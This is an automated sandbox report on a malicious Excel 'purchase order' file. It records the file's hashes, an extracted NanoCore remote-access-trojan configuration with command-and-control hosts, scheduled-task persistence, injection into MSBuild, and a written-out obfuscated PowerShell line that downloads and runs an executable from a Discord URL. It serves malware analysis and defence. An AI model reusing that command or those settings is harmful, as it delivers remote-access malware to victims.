Analysis
-
max time kernel
140s -
max time network
156s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
22-03-2021 17:39
Static task
static1
Behavioral task
behavioral1
Sample
Purchase OrderDated19032021.xls
Resource
win7v20201028
General
-
Target
Purchase OrderDated19032021.xls
-
Size
81KB
-
MD5
1a49fe1a9c135ccd9c9f2d9cf395f378
-
SHA1
24d6ab599cef554a8e8e6b2e3abffb7072e6e1db
-
SHA256
e4d560c489dba28369b781106a1334767ff82bb44b69b9e4cc6d068feb29ab6b
-
SHA512
9659a2da6cebb7d4beec1142f0a04030ce0abf08cbf75899dc903115e8160d4277429f2a23d06dcc55c1477424e8333fe8990b7a42de3c06eae2561ae3a263b3
Malware Config
Extracted
https://cdn.discordapp.com/attachments/814408945828626445/822323767334273094/VEqScSTKqHP3LQI.exe
Extracted
nanocore
1.2.2.0
185.140.53.130:2364
mydnsnanocore123.ddns.net:2364
af625c00-d1f5-4435-80be-9f676efc59dc
-
activate_away_mode
true
-
backup_connection_host
mydnsnanocore123.ddns.net
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2020-12-27T15:43:00.135192036Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
2364
-
default_group
17-03-2021NANO
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
af625c00-d1f5-4435-80be-9f676efc59dc
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
185.140.53.130
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4176 3712 Powershell.exe -
Blocklisted process makes network request 1 IoCs
Processes:
Powershell.exeflow pid process 17 4176 Powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
vjkEWrcAR.exepid process 1176 vjkEWrcAR.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
vjkEWrcAR.exedescription pid process target process PID 1176 set thread context of 4404 1176 vjkEWrcAR.exe MSBuild.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4640 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
Powershell.exeMSBuild.exepid process 4176 Powershell.exe 4176 Powershell.exe 4176 Powershell.exe 4404 MSBuild.exe 4404 MSBuild.exe 4404 MSBuild.exe 4404 MSBuild.exe 4404 MSBuild.exe 4404 MSBuild.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
MSBuild.exepid process 4404 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Powershell.exeMSBuild.exedescription pid process Token: SeDebugPrivilege 4176 Powershell.exe Token: SeDebugPrivilege 4404 MSBuild.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 4640 EXCEL.EXE 4640 EXCEL.EXE 4640 EXCEL.EXE 4640 EXCEL.EXE 4640 EXCEL.EXE 4640 EXCEL.EXE 4640 EXCEL.EXE 4640 EXCEL.EXE 4640 EXCEL.EXE 4640 EXCEL.EXE 4640 EXCEL.EXE 4640 EXCEL.EXE -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
Powershell.exevjkEWrcAR.exedescription pid process target process PID 4176 wrote to memory of 1176 4176 Powershell.exe vjkEWrcAR.exe PID 4176 wrote to memory of 1176 4176 Powershell.exe vjkEWrcAR.exe PID 4176 wrote to memory of 1176 4176 Powershell.exe vjkEWrcAR.exe PID 1176 wrote to memory of 1788 1176 vjkEWrcAR.exe schtasks.exe PID 1176 wrote to memory of 1788 1176 vjkEWrcAR.exe schtasks.exe PID 1176 wrote to memory of 1788 1176 vjkEWrcAR.exe schtasks.exe PID 1176 wrote to memory of 4404 1176 vjkEWrcAR.exe MSBuild.exe PID 1176 wrote to memory of 4404 1176 vjkEWrcAR.exe MSBuild.exe PID 1176 wrote to memory of 4404 1176 vjkEWrcAR.exe MSBuild.exe PID 1176 wrote to memory of 4404 1176 vjkEWrcAR.exe MSBuild.exe PID 1176 wrote to memory of 4404 1176 vjkEWrcAR.exe MSBuild.exe PID 1176 wrote to memory of 4404 1176 vjkEWrcAR.exe MSBuild.exe PID 1176 wrote to memory of 4404 1176 vjkEWrcAR.exe MSBuild.exe PID 1176 wrote to memory of 4404 1176 vjkEWrcAR.exe MSBuild.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Purchase OrderDated19032021.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $cqhsGtEhW='*.*-EX'.replace('*.*-','I'); sal bsbqkQGmN $cqhsGtEhW;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://cdn.discordapp.com/attachments/814408945828626445/822323767334273094/VEqScSTKqHP3LQI.exe'',$env:temp+''\''+''vjkEWrcAR.exe'')'|bsbqkQGmN; start-process($env:temp+'\'+'vjkEWrcAR.exe')1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe"C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\neodsN" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF04.tmp"3⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"{path}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tmpF04.tmpMD5
8b84f96ed1e97901159ee6f4097ecedd
SHA1437dca92cf1cb274254baf67a84a59d06f63b09e
SHA2562f88ae7aec53d77eb0ff6d5ece0b59431286cb1c2f68f50a71f32e71e898406e
SHA512bdb9fce73eaf86bd684f138bd08083026358d39720ba2b591d1bb77b53e9259a3c4cb00c83c3eaba07ac00509d17e60f0ce9c8187f09477d60389b00e2cebe9e
-
C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exeMD5
894aea17779959eecac3bd54d66844a1
SHA129e6388dbf891443bbc5a1e503a539a2586e6868
SHA2568a84d3c7b92924049e47d255f7f2243e3856c7b4425f671abc269c41ad0f53a9
SHA512bf06f689de1d89e7ea7fe9841db889496d77fb5ab6d538ce53d1bf27a8274d7e2b0bb4744f84f8940393a0dd3673ef3993b9af364ca6b7afb94fbf5d89c95964
-
C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exeMD5
894aea17779959eecac3bd54d66844a1
SHA129e6388dbf891443bbc5a1e503a539a2586e6868
SHA2568a84d3c7b92924049e47d255f7f2243e3856c7b4425f671abc269c41ad0f53a9
SHA512bf06f689de1d89e7ea7fe9841db889496d77fb5ab6d538ce53d1bf27a8274d7e2b0bb4744f84f8940393a0dd3673ef3993b9af364ca6b7afb94fbf5d89c95964
-
memory/1176-12-0x0000000000000000-mapping.dmp
-
memory/1176-16-0x0000000000D80000-0x0000000000D81000-memory.dmpFilesize
4KB
-
memory/1788-17-0x0000000000000000-mapping.dmp
-
memory/4176-9-0x000001DBFE740000-0x000001DBFE741000-memory.dmpFilesize
4KB
-
memory/4176-10-0x000001DBFE630000-0x000001DBFE632000-memory.dmpFilesize
8KB
-
memory/4176-11-0x000001DBFE633000-0x000001DBFE635000-memory.dmpFilesize
8KB
-
memory/4176-7-0x00007FF9BCE40000-0x00007FF9BD82C000-memory.dmpFilesize
9.9MB
-
memory/4176-8-0x000001DBFE0E0000-0x000001DBFE0E1000-memory.dmpFilesize
4KB
-
memory/4176-15-0x000001DBFE636000-0x000001DBFE638000-memory.dmpFilesize
8KB
-
memory/4404-20-0x000000000041E792-mapping.dmp
-
memory/4404-22-0x00000000027A1000-0x00000000027A2000-memory.dmpFilesize
4KB
-
memory/4404-21-0x00000000027A0000-0x00000000027A1000-memory.dmpFilesize
4KB
-
memory/4404-19-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/4640-5-0x00007FF9A2350000-0x00007FF9A2360000-memory.dmpFilesize
64KB
-
memory/4640-3-0x00007FF9A2350000-0x00007FF9A2360000-memory.dmpFilesize
64KB
-
memory/4640-2-0x00007FF9A2350000-0x00007FF9A2360000-memory.dmpFilesize
64KB
-
memory/4640-4-0x00007FF9A2350000-0x00007FF9A2360000-memory.dmpFilesize
64KB
-
memory/4640-6-0x00007FF9C8FC0000-0x00007FF9C95F7000-memory.dmpFilesize
6.2MB